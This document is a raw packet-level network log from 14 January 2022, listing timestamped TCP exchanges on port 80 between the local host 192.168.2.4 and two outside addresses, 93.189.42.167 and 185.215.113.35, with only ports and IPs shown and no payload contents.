Jan 14, 2022 00:16:07.477421045 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.477432013 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.477456093 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.477478981 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.477498055 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.477503061 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.477525949 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.477528095 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.477552891 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.477572918 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.477591991 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.477673054 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.477945089 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.529431105 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.672178030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.672209978 CET	49901	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.739756107 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.739924908 CET	80	49901	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:07.740348101 CET	49901	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.740353107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.741595984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.741707087 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.741780043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.741966009 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.741985083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.742136955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.742156982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.742362022 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.742379904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.742470980 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.742547035 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.742631912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.742805004 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.742822886 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.742990017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.743010998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.743170977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.743187904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.743375063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.743396044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.743473053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.743652105 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.743671894 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.743827105 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.743848085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.744046926 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.744065046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.744263887 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.744282961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.744445086 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.744461060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.744627953 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.744647026 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.744808912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.744826078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.744955063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.744996071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.745167971 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.745187044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.745683908 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.745704889 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.745832920 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.745871067 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.750013113 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.750333071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.750653982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.750674009 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.750772953 CET	49901	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.750921965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.750941038 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.751125097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.751144886 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.751313925 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.751331091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.751434088 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.751641989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.751658916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.751733065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.751844883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.751955032 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.752052069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.752247095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.752266884 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.752631903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.752649069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.752754927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.752852917 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.752950907 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.753046989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.753257990 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.753279924 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.753357887 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.753550053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.753568888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.753732920 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.753751993 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.753901005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.753937960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.754015923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.754106998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.754198074 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.754285097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.754457951 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.754477024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.754637957 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.754653931 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.754816055 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.754834890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.754928112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.755019903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.755126953 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.755213022 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.755419016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.755441904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.755579948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.758661985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.758836985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.758934975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.759022951 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.759118080 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.759223938 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.759454966 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.759541035 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.759639025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.759727955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.759816885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.759906054 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.760000944 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.760075092 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.760178089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.760335922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.760358095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.760441065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.760534048 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.760637045 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.760730982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.760824919 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.760922909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.760956049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.761054039 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.761290073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.761307955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.761465073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.761481047 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.761672974 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.761692047 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.761857033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.761873960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.762059927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.762079000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.762263060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.762279034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.762376070 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.762468100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.762552023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.762643099 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.762734890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.762824059 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.762943983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.762964010 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.763118982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.763134956 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.763292074 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.763310909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.763459921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.763478041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.763633966 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.763653040 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.763802052 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.763818026 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.763972998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.763992071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.764121056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.764141083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.764259100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.764445066 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.764463902 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.764619112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.764635086 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.764803886 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.764822960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.764983892 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.765001059 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.765177011 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.765196085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.765361071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.765377998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.765535116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.765552998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.765645027 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.765739918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.765806913 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.765885115 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.766058922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.766077042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.766232967 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.766252041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.766350985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.766452074 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.766516924 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.766678095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.766696930 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.766866922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.766885042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.767031908 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.767424107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.767607927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.767630100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.767725945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.767811060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.767920017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.768006086 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.768188953 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.768204927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.768378019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.768397093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.768554926 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.768572092 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.768691063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.768800020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.768877983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.784032106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.784249067 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.784451008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.784471989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.784627914 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.784645081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.784730911 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.784822941 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.784908056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.785070896 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.785089016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.785279036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.785296917 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.785464048 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.785501003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.785643101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.785727978 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.785912037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.785943031 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.786102057 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.786119938 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.786305904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.786323071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.786413908 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.786595106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.786613941 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.786744118 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.786783934 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.786994934 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.787014008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.787158012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.787245035 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.787398100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.787415981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.787578106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.787596941 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.787750959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.787766933 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.787885904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.787972927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.788065910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.788150072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.788234949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.788387060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.788404942 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.788563967 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.788583994 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.788763046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.788779974 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.788872957 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.788965940 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.789052963 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.789181948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.789343119 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.789361954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.789521933 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.789537907 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.789704084 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.789721966 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.789840937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.789941072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.789963961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.790070057 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.790157080 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.790256023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.790342093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.790518045 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.790538073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.790693998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.790710926 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.790877104 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.790896893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.790997028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.791126966 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.791212082 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.791296959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.791395903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.791493893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.791632891 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.791651964 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.791810989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.791830063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.791906118 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.792090893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.792110920 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.792228937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.792459965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.792644024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.792784929 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.792985916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.793004036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.793171883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.793190002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.793284893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.793373108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.793462038 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.793550014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.793646097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.793736935 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.793900013 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.793920040 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.794050932 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.794219971 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.794239044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.794332981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.800945044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.801091909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.819189072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.819437027 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.819458008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.819571972 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.819668055 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.819734097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.819814920 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.819896936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.819978952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.820067883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.820177078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:07.822438955 CET	49902	80	192.168.2.4	185.215.113.35
